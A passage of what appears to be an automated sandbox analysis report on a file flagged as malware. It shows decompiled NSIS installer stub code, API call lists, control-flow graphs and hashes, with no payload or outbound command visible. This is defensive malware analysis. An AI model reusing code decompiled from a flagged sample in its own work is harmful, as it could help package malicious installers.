                                                                                        0x00403fd6
                                                                                        0x00403fdc
                                                                                        0x00403fe3
                                                                                        0x00404027
                                                                                        0x0040402d
                                                                                        0x00404046
                                                                                        0x00404049
                                                                                        0x0040405c
                                                                                        0x00404062
                                                                                        0x00404100
                                                                                        0x00000000
                                                                                        0x00404109
                                                                                        0x00404068
                                                                                        0x00404073
                                                                                        0x00404075
                                                                                        0x00404077
                                                                                        0x00404096
                                                                                        0x00404096
                                                                                        0x00404099
                                                                                        0x0040409e
                                                                                        0x004040a1
                                                                                        0x004040b1
                                                                                        0x004040b2
                                                                                        0x004040b4
                                                                                        0x004040ea
                                                                                        0x004040fa
                                                                                        0x00000000
                                                                                        0x004040fa
                                                                                        0x004040b6
                                                                                        0x004040bc
                                                                                        0x004040d5
                                                                                        0x004040da
                                                                                        0x004040dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004040de
                                                                                        0x004040ca
                                                                                        0x004040ca
                                                                                        0x004040cc
                                                                                        0x004040cc
                                                                                        0x00000000
                                                                                        0x004040cc
                                                                                        0x004040bf
                                                                                        0x004040c4
                                                                                        0x00000000
                                                                                        0x004040c4
                                                                                        0x004040a3
                                                                                        0x004040a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004040ab
                                                                                        0x00000000
                                                                                        0x004040ab
                                                                                        0x0040409b
                                                                                        0x00000000
                                                                                        0x0040409b
                                                                                        0x00404081
                                                                                        0x00404088
                                                                                        0x0040408e
                                                                                        0x00404090
                                                                                        0x00404466
                                                                                        0x00000000
                                                                                        0x00404466
                                                                                        0x00000000
                                                                                        0x00404090
                                                                                        0x0040404e
                                                                                        0x00000000
                                                                                        0x00404056
                                                                                        0x00404035
                                                                                        0x0040403b
                                                                                        0x00404443
                                                                                        0x00404449
                                                                                        0x0040444b
                                                                                        0x00404451
                                                                                        0x00404456
                                                                                        0x0040445c
                                                                                        0x0040445c
                                                                                        0x00404451
                                                                                        0x00000000
                                                                                        0x00404449
                                                                                        0x00403fea
                                                                                        0x00403ff6
                                                                                        0x00403fff
                                                                                        0x00000000
                                                                                        0x0040401e
                                                                                        0x00404021
                                                                                        0x00000000
                                                                                        0x00404021
                                                                                        0x00403fff

                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                        • ShowWindow.USER32(?), ref: 00403FF6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                        • DestroyWindow.USER32 ref: 00404035
                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                        • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                        • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                        • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                        • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                        • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 121052019-0
                                                                                        • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                        • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                        • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                        • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 331 403cd6-403cda 321->331 329 403de9-403df1 call 40140b 326->329 330 403d6a-403d9a RegisterClassW 326->330 327->326 344 403df3-403df6 329->344 345 403dfb-403e06 call 403ec2 329->345 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 330->332 333 403eb8 330->333 335 403cec-403cf8 lstrlenW 331->335 336 403cdc-403ce9 call 405e39 331->336 332->329 338 403eba-403ec1 333->338 339 403d20-403d28 call 405e0c call 40653d 335->339 340 403cfa-403d08 lstrcmpiW 335->340 336->335 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->344 366 403ea5-403eac call 40140b 361->366 364 403e46-403e56 GetClassInfoW RegisterClassW 362->364 365 403e5c-403e7f DialogBoxParamW call 40140b 362->365 363->362 364->365 371 403e84-403e8d call 403b3c 365->371 366->344 371->338
                                                                                        C-Code - Quality: 96%
                                                                                        			E00403BEC(void* __eflags) {
                                                                                        				intOrPtr _v4;
                                                                                        				intOrPtr _v8;
                                                                                        				int _v12;
                                                                                        				void _v16;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr* _t22;
                                                                                        				void* _t30;
                                                                                        				void* _t32;
                                                                                        				int _t33;
                                                                                        				void* _t36;
                                                                                        				int _t39;
                                                                                        				int _t40;
                                                                                        				intOrPtr _t41;
                                                                                        				int _t44;
                                                                                        				short _t63;
                                                                                        				WCHAR* _t65;
                                                                                        				signed char _t69;
                                                                                        				WCHAR* _t76;
                                                                                        				intOrPtr _t82;
                                                                                        				WCHAR* _t87;
                                                                                        
                                                                                        				_t82 =  *0x434f10;
                                                                                        				_t22 = E0040690A(2);
                                                                                        				_t90 = _t22;
                                                                                        				if(_t22 == 0) {
                                                                                        					_t76 = 0x42d268;
                                                                                        					L"1033" = 0x30;
                                                                                        					 *0x442002 = 0x78;
                                                                                        					 *0x442004 = 0;
                                                                                        					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                        					__eflags =  *0x42d268;
                                                                                        					if(__eflags == 0) {
                                                                                        						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                        					}
                                                                                        					lstrcatW(L"1033", _t76);
                                                                                        				} else {
                                                                                        					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                                        				}
                                                                                        				E00403EC2(_t78, _t90);
                                                                                        				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                                                        				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                                        				 *0x434f9c = 0x10000;
                                                                                        				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                                                        					L16:
                                                                                        					if(E00405F14(_t98, _t86) == 0) {
                                                                                        						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                        					}
                                                                                        					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                        					 *0x433ee8 = _t30;
                                                                                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                        						L21:
                                                                                        						if(E0040140B(0) == 0) {
                                                                                        							_t32 = E00403EC2(_t78, __eflags);
                                                                                        							__eflags =  *0x434fa0;
                                                                                        							if( *0x434fa0 != 0) {
                                                                                        								_t33 = E00405672(_t32, 0);
                                                                                        								__eflags = _t33;
                                                                                        								if(_t33 == 0) {
                                                                                        									E0040140B(1);
                                                                                        									goto L33;
                                                                                        								}
                                                                                        								__eflags =  *0x433ecc; // 0x0
                                                                                        								if(__eflags == 0) {
                                                                                        									E0040140B(2);
                                                                                        								}
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							ShowWindow( *0x42d248, 5); // executed
                                                                                        							_t39 = E0040689A("RichEd20"); // executed
                                                                                        							__eflags = _t39;
                                                                                        							if(_t39 == 0) {
                                                                                        								E0040689A("RichEd32");
                                                                                        							}
                                                                                        							_t87 = L"RichEdit20W";
                                                                                        							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                        							__eflags = _t40;
                                                                                        							if(_t40 == 0) {
                                                                                        								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                        								 *0x433ec4 = _t87;
                                                                                        								RegisterClassW(0x433ea0);
                                                                                        							}
                                                                                        							_t41 =  *0x433ee0; // 0x0
                                                                                        							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                                        							E00403B3C(E0040140B(5), 1);
                                                                                        							return _t44;
                                                                                        						}
                                                                                        						L22:
                                                                                        						_t36 = 2;
                                                                                        						return _t36;
                                                                                        					} else {
                                                                                        						_t78 =  *0x434f00;
                                                                                        						 *0x433ea4 = E00401000;
                                                                                        						 *0x433eb0 =  *0x434f00;
                                                                                        						 *0x433eb4 = _t30;
                                                                                        						 *0x433ec4 = 0x40a380;
                                                                                        						if(RegisterClassW(0x433ea0) == 0) {
                                                                                        							L33:
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						}
                                                                                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                        						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                        						goto L21;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t78 =  *(_t82 + 0x48);
                                                                                        					_t92 = _t78;
                                                                                        					if(_t78 == 0) {
                                                                                        						goto L16;
                                                                                        					}
                                                                                        					_t76 = 0x432ea0;
                                                                                        					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                        					_t63 =  *0x432ea0; // 0x43
                                                                                        					if(_t63 == 0) {
                                                                                        						goto L16;
                                                                                        					}
                                                                                        					if(_t63 == 0x22) {
                                                                                        						_t76 = 0x432ea2;
                                                                                        						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                                        					}
                                                                                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                        						L15:
                                                                                        						E0040653D(_t86, E00405E0C(_t76));
                                                                                        						goto L16;
                                                                                        					} else {
                                                                                        						_t69 = GetFileAttributesW(_t76);
                                                                                        						if(_t69 == 0xffffffff) {
                                                                                        							L14:
                                                                                        							E00405E58(_t76);
                                                                                        							goto L15;
                                                                                        						}
                                                                                        						_t98 = _t69 & 0x00000010;
                                                                                        						if((_t69 & 0x00000010) != 0) {
                                                                                        							goto L15;
                                                                                        						}
                                                                                        						goto L14;
                                                                                        					}
                                                                                        				}
                                                                                        			}

























                                                                                        0x00403bf2
                                                                                        0x00403bfb
                                                                                        0x00403c02
                                                                                        0x00403c04
                                                                                        0x00403c18
                                                                                        0x00403c2a
                                                                                        0x00403c33
                                                                                        0x00403c3c
                                                                                        0x00403c43
                                                                                        0x00403c48
                                                                                        0x00403c4f
                                                                                        0x00403c62
                                                                                        0x00403c62
                                                                                        0x00403c6d
                                                                                        0x00403c06
                                                                                        0x00403c11
                                                                                        0x00403c11
                                                                                        0x00403c72
                                                                                        0x00403c7c
                                                                                        0x00403c85
                                                                                        0x00403c8a
                                                                                        0x00403c9b
                                                                                        0x00403d2d
                                                                                        0x00403d35
                                                                                        0x00403d3e
                                                                                        0x00403d3e
                                                                                        0x00403d54
                                                                                        0x00403d5a
                                                                                        0x00403d68
                                                                                        0x00403de9
                                                                                        0x00403df1
                                                                                        0x00403dfb
                                                                                        0x00403e00
                                                                                        0x00403e06
                                                                                        0x00403e90
                                                                                        0x00403e95
                                                                                        0x00403e97
                                                                                        0x00403eb3
                                                                                        0x00000000
                                                                                        0x00403eb3
                                                                                        0x00403e99
                                                                                        0x00403e9f
                                                                                        0x00403ea7
                                                                                        0x00403ea7
                                                                                        0x00000000
                                                                                        0x00403e9f
                                                                                        0x00403e14
                                                                                        0x00403e1f
                                                                                        0x00403e24
                                                                                        0x00403e26
                                                                                        0x00403e2d
                                                                                        0x00403e2d
                                                                                        0x00403e38
                                                                                        0x00403e40
                                                                                        0x00403e42
                                                                                        0x00403e44
                                                                                        0x00403e4d
                                                                                        0x00403e50
                                                                                        0x00403e56
                                                                                        0x00403e56
                                                                                        0x00403e5c
                                                                                        0x00403e75
                                                                                        0x00403e86
                                                                                        0x00000000
                                                                                        0x00403e8b
                                                                                        0x00403df3
                                                                                        0x00403df5
                                                                                        0x00000000
                                                                                        0x00403d6a
                                                                                        0x00403d6a
                                                                                        0x00403d76
                                                                                        0x00403d80
                                                                                        0x00403d86
                                                                                        0x00403d8b
                                                                                        0x00403d9a
                                                                                        0x00403eb8
                                                                                        0x00403eb8
                                                                                        0x00000000
                                                                                        0x00403eb8
                                                                                        0x00403da9
                                                                                        0x00403de4
                                                                                        0x00000000
                                                                                        0x00403de4
                                                                                        0x00403ca1
                                                                                        0x00403ca1
                                                                                        0x00403ca4
                                                                                        0x00403ca6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403cb4
                                                                                        0x00403cc6
                                                                                        0x00403ccb
                                                                                        0x00403cd4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403cda
                                                                                        0x00403cdc
                                                                                        0x00403ce9
                                                                                        0x00403ce9
                                                                                        0x00403cf2
                                                                                        0x00403cf8
                                                                                        0x00403d20
                                                                                        0x00403d28
                                                                                        0x00000000
                                                                                        0x00403d0a
                                                                                        0x00403d0b
                                                                                        0x00403d14
                                                                                        0x00403d1a
                                                                                        0x00403d1b
                                                                                        0x00000000
                                                                                        0x00403d1b
                                                                                        0x00403d16
                                                                                        0x00403d18
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403d18
                                                                                        0x00403cf8

                                                                                        APIs
                                                                                          • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                          • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                        • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,77473420), ref: 00403CED
                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                        • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                          • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                        • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                        • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                        • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                        • API String ID: 1975747703-1862882193
                                                                                        • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                        • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                        • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                        • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 400 40325a-403262 call 403019 393->400 401 40313a-403141 393->401 398 403205-40321d call 4034e5 call 4034cf 394->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->399 395->380 398->395 422 40321f-403225 398->422 399->395 426 403264-403275 399->426 400->395 404 403143-403157 call 405fe8 401->404 405 4031bd-4031c1 401->405 413 4031cb-4031d1 404->413 424 403159-403160 404->424 412 4031c3-4031ca call 403019 405->412 405->413 412->413 417 4031e0-4031e8 413->417 418 4031d3-4031dd call 4069f7 413->418 417->390 425 4031ee 417->425 418->417 422->395 422->399 424->413 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->413 431 40316b-403172 428->431 429->430 432 403283-403289 430->432 431->413 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fe8 432->434 433->413 436 40317d-40319d 433->436 437 4032ab 434->437 436->395 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->413 441 4031b9-4031bb 440->441 441->413
                                                                                        C-Code - Quality: 80%
                                                                                        			E0040307D(void* __eflags, signed int _a4) {
                                                                                        				DWORD* _v8;
                                                                                        				DWORD* _v12;
                                                                                        				void* _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				signed int _v44;
                                                                                        				long _t43;
                                                                                        				signed int _t50;
                                                                                        				void* _t53;
                                                                                        				void* _t57;
                                                                                        				intOrPtr* _t59;
                                                                                        				long _t60;
                                                                                        				signed int _t65;
                                                                                        				signed int _t70;
                                                                                        				signed int _t71;
                                                                                        				signed int _t77;
                                                                                        				intOrPtr _t80;
                                                                                        				long _t82;
                                                                                        				signed int _t85;
                                                                                        				signed int _t87;
                                                                                        				void* _t89;
                                                                                        				signed int _t90;
                                                                                        				signed int _t93;
                                                                                        				void* _t94;
                                                                                        
                                                                                        				_t82 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_t43 = GetTickCount();
                                                                                        				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe";
                                                                                        				 *0x434f0c = _t43 + 0x3e8;
                                                                                        				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe", 0x400);
                                                                                        				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                                        				_v16 = _t89;
                                                                                        				 *0x40a018 = _t89;
                                                                                        				if(_t89 == 0xffffffff) {
                                                                                        					return L"Error launching installer";
                                                                                        				}
                                                                                        				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                                        				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                                        				E0040653D(0x444000, E00405E58(_t92));
                                                                                        				_t50 = GetFileSize(_t89, 0);
                                                                                        				__eflags = _t50;
                                                                                        				 *0x42aa24 = _t50;
                                                                                        				_t93 = _t50;
                                                                                        				if(_t50 <= 0) {
                                                                                        					L24:
                                                                                        					E00403019(1);
                                                                                        					__eflags =  *0x434f14 - _t82;
                                                                                        					if( *0x434f14 == _t82) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					__eflags = _v8 - _t82;
                                                                                        					if(_v8 == _t82) {
                                                                                        						L28:
                                                                                        						_t34 =  &_v24; // 0x40387d
                                                                                        						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                                        						_t94 = _t53;
                                                                                        						E004034E5( *0x434f14 + 0x1c);
                                                                                        						_t35 =  &_v24; // 0x40387d
                                                                                        						_push( *_t35);
                                                                                        						_push(_t94);
                                                                                        						_push(_t82);
                                                                                        						_push(0xffffffff); // executed
                                                                                        						_t57 = E004032B4(); // executed
                                                                                        						__eflags = _t57 - _v24;
                                                                                        						if(_t57 == _v24) {
                                                                                        							__eflags = _v44 & 0x00000001;
                                                                                        							 *0x434f10 = _t94;
                                                                                        							 *0x434f18 =  *_t94;
                                                                                        							if((_v44 & 0x00000001) != 0) {
                                                                                        								 *0x434f1c =  *0x434f1c + 1;
                                                                                        								__eflags =  *0x434f1c;
                                                                                        							}
                                                                                        							_t40 = _t94 + 0x44; // 0x44
                                                                                        							_t59 = _t40;
                                                                                        							_t85 = 8;
                                                                                        							do {
                                                                                        								_t59 = _t59 - 8;
                                                                                        								 *_t59 =  *_t59 + _t94;
                                                                                        								_t85 = _t85 - 1;
                                                                                        								__eflags = _t85;
                                                                                        							} while (_t85 != 0);
                                                                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                        							 *(_t94 + 0x3c) = _t60;
                                                                                        							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						}
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					E004034E5( *0x41ea18);
                                                                                        					_t65 = E004034CF( &_a4, 4);
                                                                                        					__eflags = _t65;
                                                                                        					if(_t65 == 0) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					__eflags = _v12 - _a4;
                                                                                        					if(_v12 != _a4) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					goto L28;
                                                                                        				} else {
                                                                                        					do {
                                                                                        						_t90 = _t93;
                                                                                        						asm("sbb eax, eax");
                                                                                        						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                                        						__eflags = _t93 - _t70;
                                                                                        						if(_t93 >= _t70) {
                                                                                        							_t90 = _t70;
                                                                                        						}
                                                                                        						_t71 = E004034CF(0x416a18, _t90);
                                                                                        						__eflags = _t71;
                                                                                        						if(_t71 == 0) {
                                                                                        							E00403019(1);
                                                                                        							L29:
                                                                                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                        						}
                                                                                        						__eflags =  *0x434f14;
                                                                                        						if( *0x434f14 != 0) {
                                                                                        							__eflags = _a4 & 0x00000002;
                                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                                        								E00403019(0);
                                                                                        							}
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                                        						_t77 = _v44;
                                                                                        						__eflags = _t77 & 0xfffffff0;
                                                                                        						if((_t77 & 0xfffffff0) != 0) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _v40 - 0xdeadbeef;
                                                                                        						if(_v40 != 0xdeadbeef) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _v28 - 0x74736e49;
                                                                                        						if(_v28 != 0x74736e49) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _v32 - 0x74666f73;
                                                                                        						if(_v32 != 0x74666f73) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _v36 - 0x6c6c754e;
                                                                                        						if(_v36 != 0x6c6c754e) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						_a4 = _a4 | _t77;
                                                                                        						_t87 =  *0x41ea18; // 0xf2c45
                                                                                        						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                                        						_t80 = _v20;
                                                                                        						__eflags = _t80 - _t93;
                                                                                        						 *0x434f14 = _t87;
                                                                                        						if(_t80 > _t93) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						__eflags = _a4 & 0x00000008;
                                                                                        						if((_a4 & 0x00000008) != 0) {
                                                                                        							L16:
                                                                                        							_v8 = _v8 + 1;
                                                                                        							_t93 = _t80 - 4;
                                                                                        							__eflags = _t90 - _t93;
                                                                                        							if(_t90 > _t93) {
                                                                                        								_t90 = _t93;
                                                                                        							}
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _a4 & 0x00000004;
                                                                                        						if((_a4 & 0x00000004) != 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						goto L16;
                                                                                        						L20:
                                                                                        						__eflags = _t93 -  *0x42aa24; // 0xf4448
                                                                                        						if(__eflags < 0) {
